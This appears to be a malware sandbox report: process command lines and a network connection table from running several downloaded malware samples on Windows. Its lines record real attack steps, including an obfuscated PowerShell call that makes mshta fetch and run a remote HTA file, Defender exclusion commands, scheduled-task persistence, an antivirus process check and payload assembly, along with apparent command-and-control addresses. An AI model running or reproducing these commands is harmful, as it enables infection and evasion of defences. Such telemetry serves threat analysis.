"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x144,0x170,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8616 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe
"C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe"
C:\Users\Admin\Downloads\2023-10-21\7721b998cea6f21d723d73b315cca9941a812af0cac228f1eb697c7c3ee08207.exe
"C:\Users\Admin\Downloads\2023-10-21\7721b998cea6f21d723d73b315cca9941a812af0cac228f1eb697c7c3ee08207.exe"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\Downloads\2023-10-21\7721b998cea6f21d723d73b315cca9941a812af0cac228f1eb697c7c3ee08207.exe" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\*2\\\\msh*e '??ht??t?p?://148.113.1.180:8080/CD.h???t??a'.Replace('?','')
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://148.113.1.180:8080/CD.hta
C:\Users\Admin\Downloads\2023-10-21\a38da72082fc2dc1f60b3b245e1f2382d5f8c1d08ebc397dd0d81cc9f74ebbe6.exe
"C:\Users\Admin\Downloads\2023-10-21\a38da72082fc2dc1f60b3b245e1f2382d5f8c1d08ebc397dd0d81cc9f74ebbe6.exe"
C:\Users\Admin\Downloads\2023-10-21\9908463593e6a22247db288d2966051a140a36fc712d5b546a3112ebba6b0483.exe
"C:\Users\Admin\Downloads\2023-10-21\9908463593e6a22247db288d2966051a140a36fc712d5b546a3112ebba6b0483.exe"
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\SysWOW64\cmd.exe
cmd /k cmd < Cincinnati & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6540 -ip 6540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6540 -ip 6540
C:\Users\Admin\Downloads\2023-10-21\d2bdbe121774d186eaab95260beb2f8c5dc831464f1456cb57a7ce4a6239b8fc.exe
"C:\Users\Admin\Downloads\2023-10-21\d2bdbe121774d186eaab95260beb2f8c5dc831464f1456cb57a7ce4a6239b8fc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 772
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 424
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IEPBuzFgUzc.exe"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEPBuzFgUzc" /XML "C:\Users\Admin\AppData\Local\Temp\tmp55A4.tmp"
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe
"C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3520 -ip 3520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 560
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir 15078
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Punk + Level + Flickr + Kathy 15078\Estimated.pif
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Science + Ohio + Contact 15078\R
C:\Users\Admin\AppData\Local\Temp\39454\15078\Estimated.pif
15078\Estimated.pif 15078\R
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Roaming\dudggid
C:\Users\Admin\AppData\Roaming\dudggid
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3352 -ip 3352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3352 -ip 3352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1532
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Roaming\dudggid
C:\Users\Admin\AppData\Roaming\dudggid
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.99.217.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 183.2.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 113.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| NL | 104.110.240.59:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 59.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| NL | 104.110.240.59:443 | th.bing.com | tcp |
| NL | 104.110.240.59:443 | th.bing.com | tcp |
| NL | 104.110.240.131:443 | th.bing.com | tcp |
| NL | 104.110.240.131:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 131.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | datalake.abuse.ch | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | 48.202.162.178.in-addr.arpa | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | mayo.edu | udp |
| US | 129.176.1.88:443 | mayo.edu | tcp |
| US | 8.8.8.8:53 | www.mayo.edu | udp |
| US | 52.162.245.23:443 | www.mayo.edu | tcp |
| US | 8.8.8.8:53 | 88.1.176.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | muzu.re | udp |
| US | 172.67.148.74:443 | muzu.re | tcp |
| US | 8.8.8.8:53 | 23.245.162.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.148.67.172.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.1:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.201.35:443 | www.facebook.com | tcp |
| NL | 157.240.201.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | facebook.com | udp |
| US | 157.240.5.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | 35.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| US | 157.240.5.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | 35.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.251.36.54:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 91.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.68.29:80 | tcp | |
| FI | 77.91.68.29:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| NL | 142.251.36.54:443 | i.ytimg.com | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| NL | 142.251.36.14:443 | play.google.com | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| DE | 172.217.23.194:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 194.23.217.172.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| DE | 172.217.23.194:443 | googleads.g.doubleclick.net | udp |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.1:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | rr2---sn-q4fl6n6d.googlevideo.com | udp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 199.57.194.173.in-addr.arpa | udp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| US | 173.194.57.199:443 | rr2---sn-q4fl6n6d.googlevideo.com | tcp |
| FI | 77.91.124.1:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| IN | 148.113.1.180:8080 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| US | 8.8.8.8:53 | ok.ru | udp |
| RU | 5.61.23.11:443 | ok.ru | tcp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 172.67.148.74:443 | muzu.re | tcp |
| US | 8.8.8.8:53 | 11.23.61.5.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 142.251.39.106:443 | jnn-pa.googleapis.com | tcp |
| NL | 142.251.39.106:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | 106.39.251.142.in-addr.arpa | udp |
| NL | 142.251.36.6:443 | static.doubleclick.net | tcp |
| NL | 142.251.36.6:443 | static.doubleclick.net | tcp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| US | 8.8.8.8:53 | 6.36.251.142.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| NL | 142.251.39.106:443 | jnn-pa.googleapis.com | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.1:80 | tcp | |
| NL | 142.251.39.106:443 | jnn-pa.googleapis.com | tcp |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| US | 8.8.8.8:53 | 93.128.125.74.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.108.206.in-addr.arpa | udp |
| FR | 163.5.112.199:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | QCKtOdpBqNTFlhqybnxTg.QCKtOdpBqNTFlhqybnxTg | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | mambergame.fun | udp |
| US | 172.67.222.121:80 | mambergame.fun | tcp |
| US | 172.67.222.121:80 | mambergame.fun | tcp |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | 121.222.67.172.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.1:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.162:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 162.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 172.217.168.202:443 | jnn-pa.googleapis.com | udp |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.1:80 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.55:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
| FI | 77.91.124.82:19071 | tcp | |
